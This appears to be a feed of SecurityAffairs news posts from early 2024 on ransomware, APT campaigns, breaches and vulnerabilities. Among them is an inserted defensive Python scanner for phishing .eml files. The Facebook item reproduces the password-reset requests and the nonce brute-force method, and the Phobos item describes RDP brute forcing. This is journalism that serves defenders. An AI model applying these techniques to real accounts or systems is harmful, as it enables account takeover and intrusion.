Government experts believe that the increase in targeted attacks against the healthcare sector is the response of the group to law enforcement actions against the Blackcat group in early December 2023.

FBI, CISA, and HHS urge critical infrastructure organizations to implement the suggestions outlined in the Mitigations section of the report.

In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update, which adds features and improves defense evasion. The new encryptor can target Windows and Linux devices as well as VMware instances.

The report includes Indicators of Compromise (IoCs) along with mitigation and incident response guidance.

Recently, the U.S. Department of State announced a reward of up to $10 million for information leading to the identification or location of the key figures behind the ALPHV/Blackcat ransomware operation. The US government is also offering a reward offer of up to $5 million for information leading to the arrest and/or conviction in any country of any individual conspiring to participate in or attempting to participate in ALPHV/Blackcat ransomware attacks.

The second reward targets the affiliates and initial access brokers that facilitated the group’s attacks.

The ALPHV/Blackcat group was the second most prolific ransomware-as-a-service operation and amassed hundreds of millions of dollars in ransom payments.

The FBI developed a decryption tool that could allow over 500 victims to recover their systems for free.

“FBI identified ALPHV/Blackcat actors as having compromised over 1,000 victim entities in the United States and elsewhere, including prominent government entities (e.g., municipal governments, defense contractors, and critical infrastructure organizations).” reads the press release. “To date, the FBI has worked with dozens of victims in the United States and internationally to disseminate a decryption tool to restore victim systems and prevent ransom demand payments of approximately $99 million.”

According to the press release published by the U.S. Department of State, ALPHV/Blackcat actors have compromised over 1,000 victim entities in the United States and elsewhere.

The BlackCat/ALPHV ransomware gang has been active since November 2021, and its long list of victims includes the industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, the gas pipeline operator Creos Luxembourg S.A., the fashion giant Moncler, Swissport, NCR, and Western Digital. The group’s ransom demands range from a few tens of thousands of dollars up to tens of millions of dollars.

In a recent ALPHV/Blackcat ransomware attack, the group hit the UnitedHealth Group subsidiary Optum leading to an outage impacting the Change Healthcare payment exchange platform.

Optum Solutions is a subsidiary of UnitedHealth Group, a leading health insurance company in the United States. Optum Solutions operates the Change Healthcare platform, which serves as a critical payment exchange platform for the US healthcare system.


Pierluigi Paganini

(SecurityAffairs – hacking, ALPHV/Blackcat ransomware)

Unmasking 2024’s Email Security Landscape

28 February 2024 at 15:18

Analyzing the Email Security Landscape and exploring Emerging Threats and Trends.

In the ever-shifting digital arena, staying ahead of evolving threat trends is paramount for organizations aiming to safeguard their assets. Amidst this dynamic landscape, email stands as a primary battleground for cyber defense. VIPRE Security Group’s latest report, “Email Security in 2024: An Expert Insight into Email Threats,” delves into the cutting-edge tactics and technologies embraced by cybercriminals this year.

Drawing on an analysis of nearly a billion malicious emails, the report sheds light on advanced threats and helps organizations understand the mechanics of email-based attacks. Below are some of its key findings.

Key Findings from the “Email Security in 2024” Report

In an exhaustive review, VIPRE processed 7.2 billion emails globally, identifying approximately 950.39 million as malicious.

Protection Achievements

The VIPRE Email Security Link Isolation feature, akin to URL sandboxing, showcased its efficacy by securing over 41.9 million links clicked by users.

Detection Breakdown

  • There was a near-even split in detection methods, with 52% caught due to content and 48% via malicious links.
  • Many of the detections were due to malicious attachments and previously unseen threats, showing the importance of innovative security measures.

YARA Rules Impact

YARA rules were pivotal in detecting millions of malicious attempts spotlighting statistical patterns and malware family indicators. The adaptability of these rules contributed to a marked increase in malware detection, particularly in the fourth quarter, emphasizing the necessity of continuous evolution in email security tactics.

Emerging Threats and Trends

The landscape of email threats continues to evolve, with VIPRE’s report shedding light on several alarming trends:

  • Deepfake and AI Exploitation: Attackers increasingly leverage deepfake technology and AI to craft more convincing phishing emails, significantly raising the stakes for email security.
  • Rise of Quishing: A notable surge in phishing attacks utilizing QR codes, or “quishing,” poses new challenges, with attackers exploiting this method for its novelty and user trust.
  • Targeted Sector Vulnerabilities: Financial Services, IT, Healthcare, Education, and Government sectors have emerged as primary targets, with attackers fine-tuning their strategies to exploit specific vulnerabilities within these industries.
  • Mobile Threats: The expansion of mobile threats highlights the growing need for security awareness among mobile users, particularly as attackers develop more sophisticated methods to compromise personal and corporate data.

Phishing: The Persistent Threat

Phishing remains a dominant tactic in the cybercriminal arsenal, with the email report providing crucial insights:

Techniques Evolve: The majority of phishing attempts (71%) rely on deceptive links, but attachments (22%) and predatory QR codes (7%) are rising phishing tactics to watch out for.

Who’s Being Spoofed?: Microsoft tops the list of spoofed entities, highlighting the importance of vigilance against seemingly reputable sources.

Link and Attachment Tactics

  • A shift in phishing methodologies is observed, with a decline in link-based phishing but a slight increase in attachment-based tactics.
  • HTML and PDF attachments emerge as common vectors, underscoring the need for enhanced scrutiny of email attachments.

These insights emphasize the critical importance of remaining alert and adopting comprehensive security measures to mitigate the risks posed by the evolving landscape of phishing threats.

Spotlight on Specific Threats

The Email Security in 2024 report illuminates several specific threats that have been particularly prominent or are on the rise:

Google Group Fake Order Scams

Cybercriminals are exploiting Google Groups to distribute fake order confirmations, tricking recipients into providing personal information under the guise of canceling a non-existent order. This scam cleverly manipulates trust and the routine nature of order confirmations to breach personal security.

Seasonal Scam Emails

The report highlights an uptick in scam emails tied to holidays, leveraging the seasonal hustle to bait users into phishing traps. These scams often use newly registered domains to evade detection, exploiting users’ lowered guard during festive periods.

.EML File Attachments

A significant rise in the use of .eml file attachments for phishing attacks has been noted. These attachments, which can easily bypass traditional security measures due to their rarity in business communication, contain malicious content that, when opened, can compromise the recipient’s security.
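The .eml and HTML/PDF attachment patterns described here and in the “Link and Attachment Tactics” section above can be triaged with the standard library. The following Python is an added example, not VIPRE’s code: it parses a constructed .eml, descends into nested message/rfc822 parts (the trick that lets the inner message dodge filters that only look at the top level), and reports nested messages, HTML and PDF attachments, and the links inside text parts, with the nesting depth of each.

```python
"""Added example: triage an .eml for the attachment patterns the report calls
out (nested .eml / message/rfc822 attachments, HTML and PDF attachments, and
the links they carry).  Not VIPRE's code; the sample message is constructed
below and uses only documentation domains."""
import email
import re
from email import policy
from email.message import Message

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
RISKY_TYPES = {"text/html", "application/pdf"}
RISKY_EXT = (".html", ".htm", ".pdf", ".eml")   # .eml by name catches mislabelled content types


def iter_parts(part: Message, depth: int = 0):
    """Depth-first walk that also descends into message/rfc822 payloads."""
    yield depth, part
    if part.is_multipart():
        for sub in part.get_payload():
            yield from iter_parts(sub, depth + 1)


def scan_eml(raw: bytes) -> list[dict]:
    """Return findings: nested-eml, risky-attachment, link, each with its depth."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for depth, part in iter_parts(msg):
        ctype = part.get_content_type()
        name = part.get_filename() or ""
        if ctype == "message/rfc822":
            findings.append({"depth": depth, "kind": "nested-eml", "name": name, "detail": ctype})
            continue  # its inner parts are visited by the walk
        attached = part.get_content_disposition() == "attachment" or bool(name)
        if attached and (ctype in RISKY_TYPES or name.lower().endswith(RISKY_EXT)):
            findings.append({"depth": depth, "kind": "risky-attachment", "name": name, "detail": ctype})
        if ctype.startswith("text/"):
            for url in URL_RE.findall(part.get_content()):
                findings.append({"depth": depth, "kind": "link", "name": name, "detail": url})
    return findings


# Constructed sample: an outer message carrying a forwarded .eml that itself
# carries an HTML "form" with a credential link and a PDF stub.
SAMPLE_EML = "\n".join([
    'From: "Accounts" <billing@example.test>',
    "To: victim@example.test",
    "Subject: Invoice attached",
    "MIME-Version: 1.0",
    'Content-Type: multipart/mixed; boundary="outer"',
    "",
    "--outer",
    'Content-Type: text/plain; charset="us-ascii"',
    "",
    "Please see the attached message.",
    "--outer",
    "Content-Type: message/rfc822",
    'Content-Disposition: attachment; filename="invoice.eml"',
    "",
    'From: "Support" <support@example.test>',
    "Subject: Your invoice",
    "MIME-Version: 1.0",
    'Content-Type: multipart/mixed; boundary="inner"',
    "",
    "--inner",
    'Content-Type: text/plain; charset="us-ascii"',
    "",
    "Open the attached form to review the charge.",
    "--inner",
    'Content-Type: text/html; charset="us-ascii"',
    'Content-Disposition: attachment; filename="form.html"',
    "",
    '<html><body><a href="http://login.example.test/auth">Sign in to review</a></body></html>',
    "--inner",
    "Content-Type: application/pdf",
    'Content-Disposition: attachment; filename="statement.pdf"',
    "Content-Transfer-Encoding: base64",
    "",
    "JVBERi0xLjQK",
    "--inner--",
    "--outer--",
]).encode()

if __name__ == "__main__":
    for f in scan_eml(SAMPLE_EML):
        print(f)
```

The depth field is the useful signal: an HTML attachment two messages deep is rarely legitimate business mail, and a gateway that only inspects top-level parts never sees it. The scanner keys on the declared content type first and the file name second, since either can be chosen by the sender.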

Malware Distribution Trends

The malware landscape has shifted, with families like AsyncRAT, Qbot, RedLine, and AgentTesla taking the lead in various quarters. These malware types, particularly targeting Windows systems, highlight the need for vigilance against attachments and links that may harbor such threats.

These highlighted threats underscore the adaptability of attackers and the critical need for advanced, proactive security measures to protect against these sophisticated tactics.

Predictions for 2024

Looking to the horizon of 2024, the Email Security in 2024 Report outlines several key predictions that underscore the evolving nature of email threats:

  • Quishing’s Continued Rise: The proliferation of QR codes in phishing (quishing) is expected to escalate, taking advantage of the QR code’s growing popularity and inherent trust among users.
  • AI’s Double-Edged Sword: The advancement in AI technologies will be a boon for cybercriminals, enhancing the sophistication of attacks. Expect AI to be used in creating highly convincing spam emails, including deepfakes and personalized phishing attempts, making it increasingly difficult to distinguish between legitimate and malicious communications.
  • The Growing Threat of Identity Theft: As attackers become more adept at infiltrating inboxes, the use of AI and machine learning to mimic communication styles poses a significant risk of identity theft and sensitive data exfiltration.
  • Escalation in Cyber Warfare: State-sponsored attacks are anticipated to intensify, with email being a critical vector for targeting critical infrastructure and spreading misinformation.
  • Diversification in Malware Delivery: A broader array of file types, including .eml, .pdf, and .ppt, will be exploited to disseminate phishing and malware, challenging traditional security defenses.

These predictions highlight the need for continuous innovation in email security solutions and practices to counteract these advancing threats, ensuring that businesses and individuals can safeguard their digital communications against the next wave of cyber attacks.

About the Author: Stefanie Shank. Having spent her career in various capacities and industries under the “high tech” umbrella, Stefanie is passionate about the trends, challenges, solutions, and stories of existing and emerging technologies. A storyteller at heart, she considers herself one of the lucky ones: someone who gets to make a living doing what she loves. Stefanie is a regular writer at Bora.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Email Security)

Pharmaceutical giant Cencora discloses a data breach

28 February 2024 at 18:37

Pharmaceutical giant Cencora suffered a cyber attack and threat actors stole data from its infrastructure.

Pharmaceutical giant Cencora disclosed a data breach after it was the victim of a cyberattack.

Cencora, Inc., formerly known as AmerisourceBergen, is an American drug wholesale company and a contract research organization that was formed by the merger of Bergen Brunswig and AmeriSource in 2001. The Company had $238.6 billion in revenue for fiscal year 2022 and had approximately 44,000 employees.

The company discovered the security breach on February 21 and immediately launched an investigation into the incident.

“On February 21, 2024, Cencora, Inc. (the “Company”), learned that data from its information systems had been exfiltrated, some of which may contain personal information. Upon initial detection of the unauthorized activity, the Company immediately took containment steps and commenced an investigation with the assistance of law enforcement, cybersecurity experts and external counsel.” reads the Form 8-K filing with the Securities and Exchange Commission (SEC). “As of the date of this filing, the incident has not had a material impact on the Company’s operations, and its information systems continue to be operational. The Company has not yet determined whether the incident is reasonably likely to materially impact the Company’s financial condition or results of operations.”

In the Form 8-K filing with the SEC, Cencora said that the cyberattack had no material impact on the Company’s operations.

The company did not provide details about the attack, and it is unclear whether Cencora was hit by a ransomware attack.

Organizations in the healthcare sector are at risk of cyberattacks: a cybersecurity alert published by the FBI, CISA, and the Department of Health and Human Services (HHS) warned U.S. healthcare organizations of targeted attacks conducted by the ALPHV/Blackcat ransomware group.

In a recent ALPHV/Blackcat ransomware attack, the group hit the UnitedHealth Group subsidiary Optum leading to an outage impacting the Change Healthcare payment exchange platform.

Optum Solutions is a subsidiary of UnitedHealth Group, a leading health insurance company in the United States. Optum Solutions operates the Change Healthcare platform, which serves as a critical payment exchange platform for the US healthcare system.

Pierluigi Paganini

(SecurityAffairs – hacking, healthcare sector)

Lazarus APT exploited zero-day in Windows driver to gain kernel privileges

29 February 2024 at 08:11

North Korea-linked Lazarus APT exploited a zero-day flaw in the Windows AppLocker driver (appid.sys) to gain kernel-level access to target systems.

Avast researchers observed the North Korea-linked Lazarus APT group using an admin-to-kernel exploit for a zero-day vulnerability in the appid.sys AppLocker driver.

The zero-day, tracked as CVE-2024-21338 has been addressed by Microsoft in the February Patch Tuesday update.

The nation-state actors exploited the zero-day to gain kernel-level access and disable security software. In past attacks, threat actors achieved the same goal by using much noisier BYOVD (Bring Your Own Vulnerable Driver) techniques to cross the admin-to-kernel boundary.

Lazarus exploited the vulnerability CVE-2024-21338 to perform direct kernel object manipulation in an updated version of their FudModule rootkit.

“the holy grail of admin-to-kernel is going beyond BYOVD by exploiting a zero-day in a driver that’s known to be already installed on the target machine. To make the attack as universal as possible, the most obvious target here would be a built-in Windows driver that’s already a part of the operating system.” reads the analysis published by Avast.

“Discovering an exploitable vulnerability in such a driver is significantly more challenging than in the previous BYOVD scenarios for two reasons. First, the number of possible target drivers is vastly smaller, resulting in a much-reduced attack surface. Second, the code quality of built-in drivers is arguably higher than that of random third-party drivers, making vulnerabilities much more difficult to find.” 

The new version of the rootkit can suspend PPL (Protected Process Light) protected processes associated with Microsoft Defender, CrowdStrike Falcon, and HitmanPro. 

The flaw CVE-2024-21338 resides within the IOCTL (Input and Output Control) dispatcher of the driver appid.sys. This driver is a core component of the AppLocker application, which is used to control which apps and files users can run. 

Lazarus exploited the zero-day in the appid.sys driver by manipulating the Input and Output Control (IOCTL) dispatcher. This manipulation gives the attackers arbitrary kernel read/write access on the target system, bypassing security measures.

“The entire goal of the admin-to-kernel exploit was to corrupt the current thread’s PreviousMode. This allows for a powerful kernel read/write primitive, where the affected user-mode thread can read and write arbitrary kernel memory using the Nt(Read|Write)VirtualMemory syscalls. Armed with this primitive, the FudModule rootkit employs direct kernel object manipulation (DKOM) techniques to disrupt various kernel security mechanisms. It’s worth reiterating that FudModule is a data-only rootkit, meaning it executes entirely from user space and all the kernel tampering is performed through the read/write primitive.” reads the report.

The researchers noticed that with their valuable admin-to-kernel zero-day exposed, Lazarus’s ability to bypass security has been significantly hampered. They must now choose between finding a new critical exploit or reverting to their older, less potent BYOVD tactics.

Researchers published Indicators of Compromise (IoCs) and YARA rules for the latest version of the FudModule rootkit.

Pierluigi Paganini

(SecurityAffairs – ransomware, Lazarus) 

Is the LockBit gang resuming its operation?

29 February 2024 at 09:02

Experts warn that the LockBit ransomware group has started using updated encryptors in new attacks, after the recent law enforcement operation.

The LockBit ransomware group appears to have fully recovered its operations following the recent law enforcement initiative, code-named Operation Cronos, which aimed to disrupt its activities.

Researchers from Zscaler first observed the ransomware group using new ransom notes referencing the new Tor infrastructure.

ThreatLabz has observed new #Lockbit ransomware attacks following the law enforcement takedown operation last week.

The latest ransom note can be found in our GitHub repo: https://t.co/rZdficpiRJ

— Zscaler ThreatLabz (@Threatlabz) February 27, 2024

Researchers from BleepingComputer confirmed Zscaler’s discovery; they found samples of the encryptors uploaded to VirusTotal [1], [2].

Last week, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation.

The operation led to the arrest of two members of the ransomware gang in Poland and Ukraine and the seizure of hundreds of crypto wallets used by the group.

The British NCA took control of LockBit’s central administration environment used by the RaaS affiliates to carry out the cyberattacks. The authorities also seized the dark web Tor leak site used by the group.

The Tor leak site was seized by the NCA and is now used to publish updates on the law enforcement operation and provide support to the victims of the gang.

The NCA also obtained the source code of the LockBit platform and a huge trove of information on the group’s operation, including information on affiliates and supporters.

Law enforcement also had access to data stolen from the victims of the ransomware operation, a circumstance that highlights the fact that even when a ransom is paid, the ransomware gang often fails to delete the stolen information.

The NCA and its global partners have secured over 1,000 decryption keys that will allow victims of the gang to recover their files for free. The NCA will reach out to victims based in the UK in the coming days and weeks, providing support to help them recover encrypted data.

Now the LockBit gang is attempting to relaunch its RaaS operation: the group has set up new infrastructure and is threatening to carry out cyber attacks on the government sector.

“Very simple, that I need to attack the .gov sector more often and more, it is after such attacks that the FBI will be forced to show me weaknesses and vulnerabilities and make me stronger. By attacking the .gov sector you can know exactly if the FBI has the ability to attack us or not.” wrote the gang.

In a few days, the gang added dozens of entries to its website, but only a few of them are new victims of the group. It seems that the group is re-populating its Tor leak site.

The new leak site also includes an entry for the FBI that contains a long message to the law enforcement agency. According to the message, the FBI hacked the gang’s infrastructure because it didn’t want the group to leak information on Fulton County. The ransomware gang claimed to have stolen documents containing a lot of interesting things, including Donald Trump’s court cases, that could affect the upcoming US election.

However, some experts do not believe that the LockBit group has truly resumed its operations and consider that the law enforcement operation has put an end to the group’s activities, at least as we knew them.

Pierluigi Paganini

(SecurityAffairs – hacking, Lockbit)

New SPIKEDWINE APT group is targeting officials in Europe

29 February 2024 at 14:15

A new threat actor, dubbed SPIKEDWINE, has been observed targeting officials in Europe with a previously undetected backdoor named WINELOADER.

Zscaler researchers warn that a previously unknown threat actor dubbed SPIKEDWINE has been observed targeting European officials. The cyberspies used a bait PDF document masquerading as an invitation letter from the Ambassador of India, inviting diplomats to a wine-tasting event in February 2024.

The campaign is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed by the threat actors.

The PDF included a link to a fake questionnaire that redirects users to a malicious ZIP archive hosted on a compromised site.

The ZIP archive contains an HTA file named wine.hta that holds obfuscated JavaScript code. The script executes the next stage; its obfuscation matches that of the publicly available obfuscator obfuscator.io.

The JavaScript code retrieves an encoded ZIP archive containing WINELOADER from the same domain.

Threat actors rely on DLL hollowing to inject WINELOADER into a randomly selected DLL from the Windows system directory. 

The researchers pointed out that WINELOADER is not injected into the DLLs that contain exported functions used by the malware.

The PDF document was uploaded to VirusTotal from Latvia on January 30, 2024. The evidence collected by Zscaler suggests that this campaign has been active since at least July 6, 2023.

The threat actor used compromised websites for hosting intermediate payloads or to act as C2 servers. To avoid detection the C2 server only responds to specific types of requests at certain times.

“The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions.” concludes the report. “While we cannot currently attribute this activity to any known nation-state threat actor, we continue to monitor any new developments associated with this threat actor and ensure the necessary protections for our customers against these threats.”

Pierluigi Paganini

(SecurityAffairs – hacking, SPIKEDWINE)

Researchers found a zero-click Facebook account takeover

29 February 2024 at 21:29

A critical vulnerability in Facebook could have allowed threat actors to hijack any Facebook account, a researcher warns.

Meta addressed a critical Facebook vulnerability that could have allowed attackers to take control of any account.

The Nepalese researcher Samip Aryal described the flaw as a rate-limiting issue in a specific endpoint of Facebook’s password reset flow. An attacker could have exploited the flaw to take over any Facebook account by brute-forcing a particular type of nonce.

Meta rewarded the researcher for reporting the security issue through Facebook’s bug bounty program.

The researcher discovered that the issue affects Facebook’s password reset procedure when the user selects “Send Code via Facebook Notification.”

Analyzing the vulnerable endpoint the researcher discovered that three conditions opened the door for a brute-force attack:

  1. The nonce sent to the user is active for longer than I expected (≈ 2 hrs)
  2. The same nonce code was sent every time for the period.
  3. I didn’t see any sort of code invalidation after entering the correct code but with multiple previous invalid tries (unlike in the SMS reset functionality).

    Choosing the option “Send Code via Facebook Notification” will send a POST request to:

    POST /ajax/recover/initiate/ HTTP/1.1

    with the parameter recover_method=send_push_to_session_login

    The researcher then sent the 6-digit code ‘000000’ to analyze the POST request sent to the vulnerable endpoint:

    POST /recover/code/rm=send_push_to_session_login&spc=0&fl=default_recover&wsr=0 HTTP/1.1

    where the “n” parameter holds the nonce.

    At this stage, brute-forcing this 6-digit value had become a trivial task for the expert.

    “there was no rate limiting on this endpoint, thus the matching code was responded back with a 302 status code. Use this code to log in/reset the FB account password for the user account.” reads the analysis published by Aryal.

    The researcher noticed that upon exploiting this vulnerability, Facebook would notify the targeted user. The notification would either display the six-digit code directly or prompt the user to tap the notification to reveal the code.

    The researcher reported the flaw to Meta on January 30, 2024, and the company addressed the issue on February 2, 2024. The vulnerability had a huge impact; Meta recognized it as a zero-click account takeover exploit. Aryal is currently ranked first in Facebook’s Hall of Fame 2024.

    Pierluigi Paganini

    (SecurityAffairs – hacking, Meta)

    CISA adds Microsoft Streaming Service bug to its Known Exploited Vulnerabilities catalog

    1 March 2024 at 08:08

    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft Streaming Service vulnerability to its Known Exploited Vulnerabilities catalog.

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2023-29360 (CVSS Score 8.4) Microsoft Streaming Service Untrusted pointer dereference vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.

    An attacker can exploit this vulnerability to gain SYSTEM privileges. The vulnerability was discovered by Thomas Imbert (@masthoon) from Synacktiv (@Synacktiv) through the Trend Micro Zero Day Initiative.

    The availability of proof-of-concept (PoC) code allowed multiple threat actors to add the exploit to their attack chains.

    Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driver https://t.co/C7wvIQk7HL

    — Nicolas Krassas (@Dinosn) September 26, 2023

    In February, an analysis of Raspberry Robin samples dated before October 2023 revealed that the operators also used an exploit for CVE-2023-29360. The exploit for the vulnerability was publicly disclosed in June, and Raspberry Robin employed it in August.

    According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

    Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

    CISA orders federal agencies to fix this vulnerability by March 21, 2024.

    Pierluigi Paganini

    (SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

    Crooks stole €15 Million from European retail company Pepco

    1 March 2024 at 11:20

    Crooks stole €15.5 million from the European variety retail and discount company Pepco through a phishing attack.

    The Hungarian business of the European discount retailer Pepco Group has been the victim of a phishing attack in which crooks stole about 15 million euros ($16.3 million). The group operates three distribution lines: Poundland in the United Kingdom, Dealz in the Republic of Ireland and Spain, and Pepco in various European countries.

    “Pepco Group (“Pepco” or the “Group”) has been the target of a sophisticated fraudulent phishing attack in its Hungarian business.” reads the press release published by the company. “The attack has resulted in a loss of approximately €15.5 million in cash, before any potential recovery. It is unclear at this stage whether the funds can be recovered, although Pepco is pursuing various efforts through its banking partners and the police. At this stage, the incident does not appear to have involved any customer, supplier or colleague information or data.”

    Pepco launched an investigation into the incident with the help of law enforcement. The discount retailer is working with banks in an attempt to locate and freeze the stolen funds, however, it’s still currently unclear whether the funds can be recovered.

    The company pointed out that the cyber attack doesn’t involve any customer, supplier or staff information or data.

    The Group attempted to reassure its customers and business partners stating it possesses a robust balance sheet, currently having access to over €400 million in liquidity from cash and credit facilities.

    “The Group maintains a strong balance sheet with access today to over €400 million in available liquidity (from cash and credit facilities) and continues to generate strong cash flow from its operations. The Group takes financial controls and IT security extremely seriously and is currently conducting a group-wide review of all systems and processes to secure the business more robustly going forward.” continues the press release.

    The press release doesn’t provide technical details about the attack; however, the company was likely the victim of a Business Email Compromise (BEC) attack.

    Pierluigi Paganini

    (SecurityAffairs – hacking, Pepco)

    Five Eyes alliance warns of attacks exploiting known Ivanti Gateway flaws

    1 March 2024 at 14:01

    The Five Eyes alliance warns of threat actors exploiting known security flaws in Ivanti Connect Secure and Ivanti Policy Secure gateways.

    The Five Eyes intelligence alliance issued a joint cybersecurity advisory warning of threat actors exploiting known vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways.

    The advisory provides details about the exploitation in the wild of the Connect Secure and Policy Secure vulnerabilities CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893. Multiple threat actors are chaining these issues to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.

    CISA’s advisory also warns that the Ivanti Integrity Checker Tool is not sufficient to detect a compromise. Government experts also reported that exploitation of the flaws can allow threat actors to maintain root-level persistence.

    “The advisory describes cyber threat actor exploitation of multiple previously identified Connect Secure and Policy Secure vulnerabilities—namely CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893—which threat actors can exploit in a chain to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.” reads the advisory. “Additionally, the advisory describes two key CISA findings:

    1. The Ivanti Integrity Checker Tool is not sufficient to detect compromise due to the ability of threat actors to deceive it, and  
    2. A cyber threat actor may be able to gain root-level persistence despite the victim having issued factory resets on the Ivanti device.” 

    The advisory includes mitigations and indicators of compromise (IOCs).

    Below are the descriptions of the vulnerabilities included in the advisory:

    • The flaw CVE-2023-46805 (CVSS score 8.2) is an Authentication Bypass issue that resides in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure. A remote attacker can trigger the vulnerability to access restricted resources by bypassing control checks.
    • The second vulnerability, tracked as CVE-2024-21887 (CVSS score 9.1) is a command injection issue in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure. An authenticated administrator can exploit the issue by sending specially crafted requests and execute arbitrary commands on the appliance. An attacker can chain this flaw with the vulnerability CVE-2023-46805 to send specially crafted requests to unpatched systems and execute arbitrary commands. 
    • The vulnerability CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Connect Secure (9.x, 22.x), Policy Secure (9.x, 22.x) and Neurons for ZTA. An authenticated attacker can exploit the issue to access certain restricted resources.

    The software firm also addressed the following two additional high-severity vulnerabilities:

    • CVE-2024-21888 (CVSS score: 8.8) – Privilege escalation vulnerability in web component
    • CVE-2024-22024 (CVSS score: 8.3) – XXE vulnerability in the SAML component

    “The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available.” continues the advisory. “If a potential compromise is detected, organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.”

    In response to the joint advisory and its findings, Ivanti published an update stating that the technical findings observed in CISA’s lab have not been observed in real-world scenarios or considered viable in live customer environments. CISA and other government agencies suggest that defenders use Ivanti’s recently released external Integrity Checker Tool (ICT), made available on February 27.

    “As part of our exhaustive investigation into the recent attack against our customers, Ivanti and Mandiant released findings today regarding evolving threat actor tactics, techniques and procedures (TTPs). These findings were identified in the ongoing analysis of the previously disclosed vulnerabilities affecting Ivanti Connect Secure, Policy Secure and ZTA gateways, and include potential persistence techniques that we are monitoring, even though to date they have not been deployed successfully in the wild.” said the software firm.

    “Importantly, this is not a new CVE, and we and our security and government partners are not aware of any instances of successful threat actor persistence following implementation of security updates and factory resets.” the company added.

    Pierluigi Paganini

    (SecurityAffairs – hacking, CISA)

    Police seized Crimemarket, the largest German-speaking cybercrime marketplace

    1 March 2024 at 19:38

    German police seized the largest German-speaking cybercrime marketplace Crimemarket and arrested one of its operators.

    The Düsseldorf Police announced that a large-scale international law enforcement operation led to the seizure of the largest German-speaking cybercrime marketplace.

    “Under the direction of the North Rhine-Westphalia Cybercrime Central and Contact Office (ZAC NRW), an investigative commission at the Düsseldorf Police Headquarters has been collecting evidence for years about crimes relating to the criminal platform “Crimemarket”.” reads the press release published by the German police. “Based on the usual structure of legal digital marketplaces, narcotics, criminal services, but also detailed instructions on serious crimes were sold in various categories. In addition to the operators, the investigations are directed against both the providers operating through this marketplace and against users.”

    The investigation lasted several years during which the police performed numerous searches. The authorities arrested six individuals, including an alleged operator of the marketplace. The police seized numerous pieces of electronic equipment, including cell phones, IT devices and data carriers. In 21 cases, officers in North Rhine-Westphalia seized narcotics, including 1 kilogram of marijuana and various ecstasy tablets. The authorities also seized almost 600,000 euros in cash and movable assets.

    Crimemarket was a prominent platform for trading illegal drugs, narcotics, and cybercrime services. Operators were also offering tutorials for several criminal activities.

    During the seizure, the marketplace had more than 180,000 registered users. The platform was accessible through both the “Darknet” and the “Clearnet”.

    “On Thursday, February 29, 2024, a total of 102 search warrants were executed nationwide at the same time in the evening. The local focus of the measures was primarily in North Rhine-Westphalia with 36 search objects. A total of three people were arrested here, including the 23-year-old main suspect at his home address in the Rhine district of Neuss (Korschenbroich).” reads the press release published by the Düsseldorf Police. “A total of three more people were arrested in police measures in other federal states, which were initiated by the police there.”

    The investigation is still ongoing; the police plan to identify and target the users of the platform.

    Pierluigi Paganini

    (SecurityAffairs – hacking, Crimemarket)

    US cyber and law enforcement agencies warn of Phobos ransomware attacks

    2 March 2024 at 10:37

    US CISA, the FBI, and MS-ISAC issued a joint CSA to warn of attacks involving Phobos ransomware variants observed as recently as February 2024.

    US CISA, the FBI, and MS-ISAC issued a joint cyber security advisory (CSA) to warn of attacks involving Phobos ransomware variants such as Backmydata, Devos, Eight, Elking, and Faust.

    The attacks were observed as recently as February 2024, they targeted government, education, emergency services, healthcare, and other critical infrastructure sectors.

    The Phobos operation uses a ransomware-as-a-service (RaaS) model and has been active since May 2019.

    Based on information from open sources, government experts linked multiple Phobos ransomware variants to Phobos intrusions due to observed similarities in Tactics, Techniques, and Procedures (TTPs). Phobos intrusions also involved the use of various open-source tools, including Smokeloader, Cobalt Strike, and Bloodhound. These tools are widely available and user-friendly across different operating environments, contributing to the popularity of Phobos and its associated variants among various threat actors.

    Threat actors behind Phobos attacks were observed gaining initial access to vulnerable networks through phishing campaigns that drop hidden payloads, or by using internet protocol (IP) scanning tools, such as Angry IP Scanner, to search for exposed Remote Desktop Protocol (RDP) ports on Microsoft Windows environments.

    “Once they discover an exposed RDP service, the actors use open source brute force tools to gain access. If Phobos actors gain successful RDP authentication in the targeted environment, they perform open source research to create a victim profile and connect the targeted IP addresses to their associated companies. Threat actors leveraging Phobos have notably deployed remote access tools to establish a remote connection within the compromised network.” reads the joint CSA. “Alternatively, threat actors send spoofed email attachments that are embedded with hidden payloads such as SmokeLoader, a backdoor trojan that is often used in conjunction with Phobos. After SmokeLoader’s hidden payload is downloaded onto the victim’s system, threat actors use the malware’s functionality to download the Phobos payload and exfiltrate data from the compromised system.”

    Phobos actors were observed executing files such as 1saas.exe or cmd.exe to install additional Phobos payloads with elevated privileges enabled.

